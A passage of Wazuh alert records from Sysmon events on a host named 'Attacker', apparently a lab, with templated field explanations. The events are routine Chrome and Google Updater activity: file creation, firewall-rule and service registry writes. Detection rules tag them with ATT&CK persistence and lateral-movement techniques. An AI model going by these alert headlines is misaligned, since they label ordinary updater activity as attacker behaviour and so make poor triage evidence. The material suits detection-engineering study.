ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00}
ProcessId: 772
Image: C:\WINDOWS\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\GoogleUpdaterInternalService137.0.7129.0\ImagePath
Details: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:59.311 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534057.595757 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:01.6661763Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225394 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:41:01.664
ProcessGuid: {94294ddc-50a3-6804-9f08-000000000e00}
ProcessId: 12284
Image: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe
TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\135.0.7049.96_135.0.7049.86_chrome_updater.exe
CreationUtcTime: 2025-04-20 01:41:01.664
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:01.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50a3-6804-9f08-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\135.0.7049.96_135.0.7049.86_chrome_updater.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:41:01.664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534057.598703 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:01.9448813Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225427 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:41:01.943
ProcessGuid: {94294ddc-50ad-6804-ba08-000000000e00}
ProcessId: 13184
Image: C:\Program Files\Google\Chrome\Application\135.0.7049.86\Installer\setup.exe
TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe
CreationUtcTime: 2025-04-20 01:41:01.943
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:01.943 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-50ad-6804-ba08-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13184 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.86\\Installer\\setup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\CR_72F4F.tmp\\setup.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:41:01.943 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534061.601600 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:13.3160671Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225933 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:41:13.315
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B64D6AD1-CF9C-428B-9611-31035EE40213}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:13.315 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534061.605893 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:13.3543878Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225936 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:41:13.351
ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00}
ProcessId: 2892
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095}
Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
User: NT AUTHORITY\LOCAL SERVICE" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:13.351 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea86-67fe-3b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{34C7F7EC-FD01-4B0C-9AE2-0AC035634095} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=Google Chrome (mDNS-In)|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"
🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\"
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath binary is: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\" Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92307 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid13_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534061.610121 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:41:13.3671970Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 225940 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-20 01:41:13.364
ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00}
ProcessId: 772
Image: C:\WINDOWS\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\GoogleChromeElevationService\ImagePath
Details: "C:\Program Files\Google\Chrome\Application\135.0.7049.96\elevation_service.exe"
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:41:13.364 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\System\\CurrentControlSet\\Services\\GoogleChromeElevationService\\ImagePath No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: \"C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.96\\elevation_service.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534062.613301 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
